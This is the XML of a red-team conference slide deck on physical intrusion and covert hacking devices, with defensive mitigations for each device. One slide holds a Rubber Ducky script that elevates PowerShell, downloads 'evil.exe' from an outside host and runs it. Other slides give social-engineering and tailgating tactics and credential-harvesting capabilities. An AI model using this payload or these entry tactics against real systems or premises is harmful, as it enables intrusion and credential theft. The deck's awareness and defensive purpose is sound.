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Proxima Nova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bold.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ProximaNova-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ProximaNova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e1c3aa934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e1c3aa934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e1c3aa93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e1c3aa93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e1c3aa93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e1c3aa93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f3bc67ef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f3bc67ef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f3bc67ef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f3bc67ef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f3bc67ef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f3bc67ef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f4bb59e2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f4bb59e2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f3bc67ef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f3bc67ef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e1c3aa93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e1c3aa93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f3bc67ef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f3bc67ef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e1c3aa9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e1c3aa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f3bc67ef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f3bc67ef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e1c3aa93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e1c3aa93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f3bc67ef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f3bc67ef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e1c3aa934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e1c3aa93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f3bc67ef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f3bc67ef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e1c3aa93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e1c3aa93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f3bc67ef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f3bc67ef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e1c3aa934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e1c3aa934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f3bc67ef4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f3bc67ef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e1c3aa934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4e1c3aa934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e1c3aa93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4e1c3aa93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e1c3aa93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e1c3aa93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4f3bc67ef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4f3bc67ef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4e1c3aa93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4e1c3aa93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e1c3aa93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e1c3aa93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e1c3aa93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e1c3aa93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hyperlink" Target="mailto:vap0r@quelabs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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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10.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/><Relationship Id="rId7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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="199425"/>
            <a:ext cx="8520600" cy="14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</a:rPr>
              <a:t>Tiny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nefarious</a:t>
            </a:r>
            <a:endParaRPr sz="36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</a:rPr>
              <a:t>Hacking Devices		</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890600" y="3557125"/>
            <a:ext cx="36558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2/1/2019</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brad Welch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Team Lead/PO</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>vap0r@quelabs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Proton mail)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4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Social Engineering</a:t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168" name="Google Shape;168;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221575" y="1228000"/>
            <a:ext cx="5238300" cy="32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No access badge required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Requires nerves of steel and confidence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be monitored and recorded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Most likely will get caught eventually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Use stories, food or boxes to ask for help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Create a badge that looks genuine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Leverage the mindset that people want to help someone in need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Last resort I’ll use crutches to get someone to hold the door open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9" name="Google Shape;16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2125" y="1592375"/>
            <a:ext cx="3626100" cy="195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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221575" y="218250"/>
            <a:ext cx="84501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We have physical access, now what?</a:t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175" name="Google Shape;175;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369675" y="1376800"/>
            <a:ext cx="6687900" cy="25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Recon looking for people with escalated </a:t>
            </a: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privileges</a:t>
            </a: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Look for ways to gain additional access (data centers)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Secure remote logical access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Plant devices to capture credentials, enumerate networks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Method to exfiltrate data out of band if possible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Are there assets to physical walk out with (laptops, drives, printed checks, stationary with a letterhead)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Kensington cables used to secure laptops can be picked in under 60 seconds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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108225" y="1109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Finally- TND!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181" name="Google Shape;18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050" y="1189075"/>
            <a:ext cx="4013425" cy="1689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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136175" y="500650"/>
            <a:ext cx="3400500" cy="5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Rubber Ducky</a:t>
            </a:r>
            <a:endParaRPr sz="3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3" name="Google Shape;183;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161775" y="2996775"/>
            <a:ext cx="4410300" cy="17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Workstation must be unlocked when used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Very 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opportunistic but well worth it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Looks like a keyboard to the computer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Types in a predetermined command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Single shot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 command and control client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Download and run malware from the internet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 software keylogger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4" name="Google Shape;184;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4694825" y="2996775"/>
            <a:ext cx="4345200" cy="17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Cheap to buy or build $10-$30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be used during USB drops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Looks like a standard USB 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thumb drive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Walk up, plug in, 8-10 seconds remove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Extremely dangerous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Ducky HID Vendor ID is configurable- You can make it look like any type of keyboard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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804250" y="148750"/>
            <a:ext cx="59889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What the script looks like</a:t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190" name="Google Shape;190;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769850" y="869150"/>
            <a:ext cx="8223000" cy="27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REM let the HID enumerate</a:t>
            </a:r>
            <a:b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DELAY 1000</a:t>
            </a:r>
            <a:b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GUI r</a:t>
            </a:r>
            <a:b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DELAY 200</a:t>
            </a:r>
            <a:b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STRING </a:t>
            </a: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powershell Start-Process powershell -Verb runAs</a:t>
            </a:r>
            <a:b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ENTER</a:t>
            </a:r>
            <a:b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DELAY 1000</a:t>
            </a:r>
            <a:b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ALT y</a:t>
            </a:r>
            <a:b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DELAY 200</a:t>
            </a:r>
            <a:b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STRING $down = New-Object System.Net.WebClient; $url = 'https://cau5tic.com'; $file = 'evil.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804250" y="148750"/>
            <a:ext cx="59889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What just happened?</a:t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196" name="Google Shape;196;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246900" y="1133550"/>
            <a:ext cx="7481400" cy="32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Plugged ducky into an unlocked machine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Ducky initializes and runs the script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script will go out to cau5tic.com and pull down the file evil.exe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script runs evil.exe with the user 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privileges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Evil.exe can be anything from creating a remote desktop connection to creating a reverse shell to my attacking machine.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It can also download a virus that will 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propagate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out to other machines internally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Typically referred to as a stager as it will go pull the actual code and run it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Once this is executed an attacker has full control over your machine and will install some type of persistence so they have access when your machine is online or rebooted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With full control new malware can be download and run at any time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Most of the other attacks will look similar to this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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804250" y="148750"/>
            <a:ext cx="59889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Types of Connections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202" name="Google Shape;20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250" y="879875"/>
            <a:ext cx="6195900" cy="370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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804250" y="148750"/>
            <a:ext cx="59889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Types of Connections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208" name="Google Shape;20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1901" y="916400"/>
            <a:ext cx="6205299" cy="407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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759750" y="82625"/>
            <a:ext cx="6135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Rubber Ducky Mitigation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214" name="Google Shape;21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8400" y="1075750"/>
            <a:ext cx="3376454" cy="142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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001300" y="2609500"/>
            <a:ext cx="7369800" cy="17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Extremely difficult to deal with as it looks like a keyboard to the system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Whitelist certain vendor HID ID’s but that can be hard to manage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Ensure employees are locking workstations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Set Windows GPO to a standard screen timeout of 5-10 minutes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Security awareness training, encourage coworkers to report activity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 not plug an unknown USB device into your workstation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Create an enterprise policy to only use approved devices (not really a control)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Require a filtering proxy for outbound external traffic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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486050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Cactus Ducky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221" name="Google Shape;22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3225" y="788850"/>
            <a:ext cx="3635475" cy="3635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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330625" y="1237475"/>
            <a:ext cx="4488300" cy="3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Some of the same issues as with Rubber Duck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Not single use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WIFI capable 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May require social engineering to generate a distraction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Remotely (within range) create and run payloads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attempt several different attacks to find one that works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 software keylogger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Download and install malware from the internet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Cheap to use roughly $20 from China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Same mitigation steps as Ducky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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486050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Regular USB drive</a:t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228" name="Google Shape;228;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330625" y="1237475"/>
            <a:ext cx="5235900" cy="3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Skips the step of having to download the code remotely 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Malicious software sits on the device itself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Users are enticed to click on a file named “2019 Staff Reduction”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Relies completely on a user picking it up, plugging it in and double clicking on a file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Single use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Allows for large complex payloads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attempt several different attacks to find one that works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 software keylogger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Download and install malware from the internet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Cheap to use roughly $2-$3 from China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Allows for C2 (command and control) to be installed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Used in large USB drops in parking lots or by entrances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9" name="Google Shape;22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6425" y="1668625"/>
            <a:ext cx="302895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</a:rPr>
              <a:t>Quick Background		</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840125" y="1643200"/>
            <a:ext cx="6132600" cy="23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+25 years in security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+10 years of Penetration Testing and Red Teaming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Current Red Team lead at a fortune 20 company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Specialize in physical and hardware security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Built a successful Red Team from the bottom up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Not a fan of PowerPoint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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486050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Regular USB Drive Mitigation</a:t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235" name="Google Shape;235;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410500" y="1530300"/>
            <a:ext cx="5235900" cy="3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Security Awareness Training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Have a plan for when devices are found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Block unknown USB devices from being accessed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Create a policy that only company provided devices can be plugged in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Disable writing to USB drives to stop insider threats from stealing data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6" name="Google Shape;23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6425" y="1668625"/>
            <a:ext cx="302895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Hardware Keylogger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242" name="Google Shape;24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975" y="402825"/>
            <a:ext cx="1840775" cy="134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0275" y="2261475"/>
            <a:ext cx="2294175" cy="232322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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396750" y="1321850"/>
            <a:ext cx="5601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5" name="Google Shape;245;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396750" y="1321850"/>
            <a:ext cx="5705400" cy="30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Very hard to physically detect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Difficult to defend against as it is a pass through device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Not detectable by the computer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Plugs in between the keyboard and the computer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be hidden with a USB extension cable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Captures every single keystroke (your password)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Some models use WIFI to connect remotely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Some models the logger is built into the cable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be installed at any time (workstation locked)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Non WIFI enabled loggers will have to be physically retrieved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Store days of keystrokes with auto overwrite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 will use this as a fail proof backup to get credentials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Allows an attacker to use your password to log in as you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Everything is possible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6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Hardware Keylogger Mitigation</a:t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251" name="Google Shape;251;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396750" y="1321850"/>
            <a:ext cx="5601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2" name="Google Shape;252;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511425" y="1558025"/>
            <a:ext cx="5913300" cy="13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Almost impossible to detect or prevent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Security awareness training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Encourage coworkers to report </a:t>
            </a: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suspicious</a:t>
            </a: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activity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There is nothing for the system to detect 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7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Lan Turtle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258" name="Google Shape;25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2550" y="794163"/>
            <a:ext cx="4519725" cy="35551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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340075" y="1218575"/>
            <a:ext cx="40620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Another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Hak5 tool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Intended to be placed in line between the ethernet cable and the computer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Deep packet capture of the network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Several predefined basic modules for use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Automatically creates a shell out to the attacking machine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New Turtles have cellular 3/4G for out of band exfiltration and remote access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Similar tools used with the Bash Bunny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Cheap @ $50 + SIM card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Known as a RAT (remote access terminal) or MITM (Man In The Middle) attack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Same benefits as the other attacks plus exfil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8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Lan Turtle Mitigation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265" name="Google Shape;26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625" y="1429083"/>
            <a:ext cx="2905376" cy="228532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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629600" y="1948000"/>
            <a:ext cx="5252100" cy="19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Leverage Windows GPO to prevent new USB ethernet devices from installing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Security Awareness Training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NAC (Network Access Controls) can help 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Require a filtering proxy for external traffic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9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Bash Bunny</a:t>
            </a:r>
            <a:endParaRPr sz="36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272" name="Google Shape;272;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689575" y="1209125"/>
            <a:ext cx="6017400" cy="31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Designed by Hak5 with more functionality than the Lan Turtle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Intended to allow remote access through tunneling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Quad core ARM processor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Tiny computer allows some small tools to be installed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Sets up a secure tunnel out to the attacker through the WAN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sniff some internal network for credentials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emulate a windows share for small storage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Uses responder to collect NTLM hashes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pull browser history and stored browser passwords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pull out saved WIFI credentials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Configurable to look through the Desktop or My Documents folder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Emulates a Rubber Ducky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Creates a local ethernet connection via USB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Results in the same abilities as the other attacks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3" name="Google Shape;27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9375" y="941250"/>
            <a:ext cx="2132225" cy="213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0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Bash Bunny Mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="36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279" name="Google Shape;279;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841975" y="1464150"/>
            <a:ext cx="6017400" cy="31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Leverage Windows GPO to prevent new USB ethernet devices from installing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Security Awareness Training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NAC (Network Access Controls) can help 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Require a filtering proxy for external traffic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Not much will stop this type of attack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0" name="Google Shape;28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9375" y="941250"/>
            <a:ext cx="2132225" cy="213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1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Raspberry Pi Zero W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286" name="Google Shape;28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1225" y="1596425"/>
            <a:ext cx="3477626" cy="23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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221575" y="1341375"/>
            <a:ext cx="5474400" cy="3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Full computer running linux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Very small, easy to hide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Most linux tools will run on it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While not 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intended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to be an attack tool, it works well as one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 place several on the network in a different locations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attached a cellular modem for out of band access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 usually use POE if possible (Power of Ethernet) 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Black tape to cover up flash LED’s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Capable of running Perl, Python, Ruby, Metasploit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Hide in phone closets or under floor in data centers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Sometimes can even crack basic passwords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is my go to device when wanting remote access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Inexpensive, sometimes on sale for $3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Gives the most flexibility and provide the same type of attacks as the other devices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2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Raspberry Pi Zero W Mitigation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293" name="Google Shape;29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1225" y="1596425"/>
            <a:ext cx="3477626" cy="23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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514425" y="2002625"/>
            <a:ext cx="5484000" cy="22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NAC can help, especially if certificates are required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Automate discovery of new devices on the network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Security awareness training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Report any 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unusual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devices noticed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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693100" y="1764600"/>
            <a:ext cx="61002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Whats stops a device from</a:t>
            </a:r>
            <a:endParaRPr sz="36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 being removed if found?</a:t>
            </a:r>
            <a:endParaRPr sz="36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Agenda</a:t>
            </a:r>
            <a:endParaRPr sz="3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 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117" name="Google Shape;117;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761150" y="1330800"/>
            <a:ext cx="4293300" cy="23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Topic overview</a:t>
            </a:r>
            <a:endParaRPr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Assumptions</a:t>
            </a:r>
            <a:endParaRPr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Quick touch on physical security</a:t>
            </a:r>
            <a:endParaRPr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Devices and mitigation</a:t>
            </a:r>
            <a:endParaRPr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Off the shelf vs homebrew</a:t>
            </a:r>
            <a:endParaRPr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Summary</a:t>
            </a:r>
            <a:endParaRPr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Questions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4726" y="0"/>
            <a:ext cx="3652153" cy="4869547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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991850" y="2286025"/>
            <a:ext cx="2909400" cy="11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 silly label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“Internal Investigation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Do Not Remove”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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257250" y="303225"/>
            <a:ext cx="3474000" cy="7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Buy or Build?</a:t>
            </a:r>
            <a:endParaRPr sz="36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311" name="Google Shape;311;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198375" y="1492500"/>
            <a:ext cx="4883700" cy="3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Buying is fast and devices are cheap now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Building requires additional skills and resources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Five years ago almost everything had to be built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market in China is flooded with cheap hardware to do almost anything needed for attacking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Services will take a concept to design and production for a very small price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Big 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drawback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to purchasing is I don’t trust code/firmware from other countries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2" name="Google Shape;31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4475" y="0"/>
            <a:ext cx="3743319" cy="499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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257250" y="246575"/>
            <a:ext cx="8629500" cy="9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Summary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318" name="Google Shape;318;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133550" y="1586950"/>
            <a:ext cx="74625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Hardware devices can be very small and hidden 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When undetected these devices can compromise your home or enterprise network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Devices emulate an attacker sitting in front of your computer logged in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Devices are used as an entry point, once leveraged we have access to exploit anything else on the network (servers, routers, cameras, databases)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Most Red Teamers consider physical access an easy target with great returns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Many hardware devices are difficult to detect and protect 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against</a:t>
            </a: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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389500" y="256000"/>
            <a:ext cx="3653400" cy="10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Questions?</a:t>
            </a:r>
            <a:endParaRPr sz="36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324" name="Google Shape;32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725" y="1108025"/>
            <a:ext cx="4778550" cy="313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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413325" y="273550"/>
            <a:ext cx="38289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</a:rPr>
              <a:t>Overview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23" name="Google Shape;123;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219900" y="1560650"/>
            <a:ext cx="7825200" cy="3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Physical security has taken a back seat to logical security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Physical controls are usually near the bottom of the budget list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High risk high reward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Insider threat removes the requirement of physically breaching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Conducting physical attacks requires a unique mindset and bravado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White hat physical testing can be legally and physically harmful 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Always document scoping and work with local law enforcement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Poor physical security can result in a complete compromise of data integrity using the tools described during this talk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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234775" y="489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Assumptions</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812375" y="1660150"/>
            <a:ext cx="7485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Most of the devices will require an assumed breach or insider threat scenario to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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White hats will sometimes incorporate white carding into the testing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Tests are authorized and approved at the highest levels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Tests are not announced to the general workforce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Information provided is my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opinion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and may not reflect my employers point of view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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2044350" y="1515950"/>
            <a:ext cx="6484200" cy="25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Proxima Nova"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="24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Attacking physical locks</a:t>
            </a:r>
            <a:endParaRPr sz="2400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Proxima Nova"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="24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Attacking electronic locks</a:t>
            </a:r>
            <a:endParaRPr sz="2400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Proxima Nova"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="24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Tailgating</a:t>
            </a:r>
            <a:endParaRPr sz="2400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Proxima Nova"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="24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Social engineering</a:t>
            </a:r>
            <a:endParaRPr sz="2400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Proxima Nova"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="24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Walk in (business is open to the public)</a:t>
            </a:r>
            <a:endParaRPr sz="2400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5" name="Google Shape;135;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136775" y="298925"/>
            <a:ext cx="8123100" cy="7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Methods to gain entry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177600" y="216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Door Entry Tools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141" name="Google Shape;14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9075" y="3180363"/>
            <a:ext cx="1551101" cy="155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2413" y="3300138"/>
            <a:ext cx="3110125" cy="131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6550" y="1491000"/>
            <a:ext cx="1920050" cy="14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21850" y="1097237"/>
            <a:ext cx="2140650" cy="17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7752" y="1171527"/>
            <a:ext cx="1311575" cy="131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Electronic doors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151" name="Google Shape;1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00" y="3688550"/>
            <a:ext cx="1783050" cy="99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800" y="1050010"/>
            <a:ext cx="1783049" cy="2377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0325" y="271738"/>
            <a:ext cx="2628174" cy="3504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96346" y="1133551"/>
            <a:ext cx="2021725" cy="2695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91345" y="3505595"/>
            <a:ext cx="1364375" cy="136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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221575" y="218250"/>
            <a:ext cx="73650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3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tailgating</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;16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3700" y="620050"/>
            <a:ext cx="4363751" cy="404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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396750" y="1700350"/>
            <a:ext cx="38352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No access badge required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Must be a ninja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Requires nerve and confidence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Can be monitored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Most likely will get caught especially at smaller companies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